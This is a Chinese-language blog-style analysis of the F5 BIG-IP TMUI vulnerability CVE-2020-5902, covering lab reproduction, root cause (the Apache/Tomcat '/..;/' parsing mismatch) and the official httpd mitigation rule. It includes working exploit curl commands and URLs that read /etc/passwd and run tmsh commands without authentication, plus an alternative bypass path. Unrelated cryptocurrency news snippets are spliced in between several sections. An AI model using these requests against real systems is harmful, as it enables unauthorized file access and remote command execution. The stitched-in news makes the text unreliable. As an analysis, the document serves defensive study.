前言
今日一早起来推特以及各大技术论坛上炸开了锅,安全圈子的人都在讨论F5设备里远程代码执行的漏洞。很多讨论的内容,大部分是在分享如何寻找目标,利用漏洞,并没有关于对漏洞成因的分析。CertiK的安全研究员下载了存在漏洞的程序,搭建环境复现漏洞后,对漏洞的起因进行了分析,并在下文分享给大家。
背景
F5BIG-IP是美国F5公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。PositiveTechnologies的研究人员MikhailKlyuchnikov发现其配置工具TrafficManagementUserInterface中存在远程代码执行漏洞,CVE编号为CVE-2020-5902。该漏洞CVSSv3评分为10分,攻击者可利用该漏洞创建或删除文件,关闭服务、执行任意的系统命令,最终获得服务器的完全控制权。CVE具体表述请查看文章底部参考链接1。
受影响的BIG-IP软件版本
漏洞利用
读取任意文件:
curl-k'https:///tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'
高盛前高管:黄金与比特币的相关性正被打破:金色财经报道,高盛前对冲基金经理、Real Vision创始人兼首席执行官Raoul Pal发推文称,正如MicroStrategy创始人Michael Saylor此前预期的那样,黄金与比特币的相关性正在被打破。大家注意,预计接下来比特币与美元以及与股票之间的相关性也将被打破。[2020/10/23]
远程执行tmsh命令:
curl-k'https:///tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'
官方给出的临时修复方案(后文会对修复进行分析):
漏洞复现
在F5的官网注册账号之后,可以从F5的资源库中下载存在漏洞的BIG-IP软件。访问参考链接2可以下载BIG-IPTMOS(TrafficManagementOperatingSystem,流量管理操作系统)的虚拟机镜像。CertiK技术团队因为使用VmwareFusion,下载的是“BIGIP-15.0.0-0.0.39.ALL_1SLOT-vmware.ova-ImagefilesetforVMwareESX/iServer”。
V神:以太坊EIP-2929提案或将打破部分已有智能合约:为了减小以太坊飙升的交易费,以太坊创始人Vitalik Buterin?于2日发布了以太坊改进提案EIP-2929,他建议将一些合约收费提高三倍,受影响的合约包括更新以太坊状态的合约,以及一些应用程序。但是这个重新定价的提议可能会打破一些已经在以太坊上运行的智能合约,批准这一提议也需要以太坊社区的一致同意,这一过程可能需要数周或数月的时间。(Coindesk)[2020/9/4]
在VmwareFusion中加载镜像(import):
加载完成之后,使用默认用户名密码登陆系统:
用户名:root
密码:default
系统初始化之后,使用”ifconfig”命令查询虚拟机IP地址。CertiK技术团队的BIG-IPTMUI虚拟机IP地址为”172.16.4.137”。
在浏览器中访问BIG-IPTMUI登陆界面:
https://172.16.4.137/tmui/login.jsp
动态 | 分布式系统专家王嘉平提出Monoxide扩容方案有望打破不可能三角瓶颈:计算机网络顶级学术会议 NSDI 宣布录用由两位华人研究人员撰写的关于区块链扩容方案的论文。该论文提出名为Monoxide的区块链扩容方案,可以在由 4.8 万个全球节点组成的测试环境中,实现比比特币网络高出 1000 倍的每秒事务处理量,以及 1000 倍的状态内存容量,从而有望打破不可能三角这个长期困扰区块链性能的瓶颈。Monoxide扩容方案的提出者王嘉平和 Wang Hao 均毕业于中国科学院计算所,王嘉平曾就职于微软研究院,长期从事分布式系统研究,Wang Hao 就职于俄亥俄州立大学,从事分布式系统和数据库系统方面的研究。NSDI 是 USENIX 旗下的旗舰会议,是计算机网络系统领域久负盛名的顶级会议。该论文发表,是主流学术界首次对区块链扩容方案相关研究的认可。[2018/12/21]
复现任意文件读取:
在浏览器中访问以下地址可以读取”/etc/passwd”文件内容:
https://172.16.4.137/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
动态 | 委内瑞拉以每周5亿玻利瓦尔打破比特币交易记录:据Coin Dance的数据,在截至8月25日的七天里,比特币和委内瑞拉玻利瓦尔(VES)之间的交易打破了历史记录,超过5亿美元。就在这个结果公布的同一周,委内瑞拉重估了玻利瓦尔的币值,创造了新的主权玻利瓦尔,在此过程中,委内瑞拉货币贬值了96%。[2018/8/30]
复现tmsh命令执行:
https://172.16.4.137/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin
漏洞分析
在进入漏洞分析前,先要明确一点:漏洞利用中的fileRead.jsp和tmshCmd.jsp文件在用户登陆后本身是可以被访问的。
下面的截图显示了登陆前和登陆后访问以下URL的区别:
https://172.16.4.137/tmui/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
公告 | Taxa Network已通过区块链安全公司CertiK智能合约安全审计:Taxa团队宣布已通过区块链安全公司CertiK智能合约的安全审计,这将确保Taxa主网在今年春天顺利发布。CertiK的智能标签对TXT智能合约源代码进行了100%形式化验证覆盖,并辅以安全专家人工逐行审核。审计结果认为TXT智能合约结构坚固,不存在整数溢出、函数错误、缓冲区溢出等漏洞。[2020/2/13]
登陆前访问:
被跳转回登陆界面
输入账号密码登陆管理界面之后再访问,可执行fileRead.jsp读取文件。
fileRead.jsp和tmshCmd.jsp虽然是在PoC中最终被利用的文件,但是他们并不是漏洞的起因。此漏洞的本质是利用Apache和后台Java(tomcat)对URL的解析方式不同来绕过登陆限制,在未授权的情况下,访问后台JSP模块。CertiK技术人员第一次注意到此类型漏洞是在2018年Orange的BlackHat演讲:“BreakingParserLogicTakeYourPathNormalizationOffandPop0DaysOut”.这里可以查看演讲稿件(参考链接2)。
这里我们可以理解在F5BIG-IP的后台服务器对收到了URL请求进行了两次的解析,第一次是httpd(Apache),第二次是后一层的Java(tomcat).
在URL在第一次被Apache解析时,Apache关注的是URL的前半段https://172.16.4.137/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
当Apache在看见前半段是合法URL且是允许被访问的页面时,就把它交给了后面的第二层。Apache在这里完全把URL里面关键的/..;/给无视了。
在URL在第二次被解析时,后面的Java(tomcat)会把/..;/理解为,向上返回一层路径。此时,/login.jsp/和/..;/会抵消掉。Tomcat看到的真正请求从
https://172.16.4.137/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
变成了:
https://172.16.4.137/tmui/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
再来fileRead.jsp并没有对收到的请求进行身份验证,后台因此直接执行fileRead.jsp,读取并返回了/etc/passwd文件的内容。
根据以上的思路,其实可以找出别的利用漏洞的URL,比如:
https://172.16.4.137/tmui/tmui/login/legal.html/..;/..;/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
这里“https://172.16.4.137/tmui/tmui/login/legal.html”和之前的“login.jsp”一样,是一个不需要登陆就能访问的页面。但是因为要向上返回两次,需要用两个/..;/来抵消掉”/login/legal.html”。
回到开头提到的官方给出的临时修复方案,修复方案的本质是在httpd的配置中添加以下规则:
include'
<LocationMatch".*\\.\\.;.*">
Redirect404/
</LocationMatch>
'
这个规则的意思是,当http服务器在监测到URL中包含..;(句号句号分号)的时候,直接返回404.这样利用漏洞的请求就没办法到达后台(第二层)了。
如何避免漏洞:
此漏洞的利用方式在网络上公开之后,因为它的攻击成本低廉,大批黑客都开始图谋利用此漏洞攻击使用F5BIG-IP产品的系统。黑客只需要付出极小的代价就能获得目标系统的控制权,对系统产生巨大的破坏。
俗话说:“不怕贼偷,就怕贼惦记”。即便这样的黑客攻击事件这次没有发生在你身上,不代表你是安全的。因为很有可能黑客的下一个目标就是你。
而Certik的专业技术团队会帮你彻底打消这种“贼惦记”的担忧。CertiK专业渗透测试团队会通过对此类事件的监测,第一时间给客户提交漏洞预警报告,帮助客户了解漏洞细节以及防护措施。此举可以确保客户的系统不受攻击并且不会遭受财产损失。
同时作为一名安全技术人员,在新漏洞被发现的时,不仅需要知道漏洞是如何被黑客利用的,更要去探寻漏洞背后的原因,方可积累经验,更加有能力在复杂的系统中发现隐藏的漏洞。
CertiK以及其技术人员,将永远把安全当做信仰,与大家一同学习并一同成长。
参考链接
1.https://cve.mitre.org/
2.https://downloads.f5.com/
3.https://i.blackhat.com/
郑重声明: 本文版权归原作者所有, 转载文章仅为传播更多信息之目的, 如作者信息标记有误, 请第一时间联系我们修改或删除, 多谢。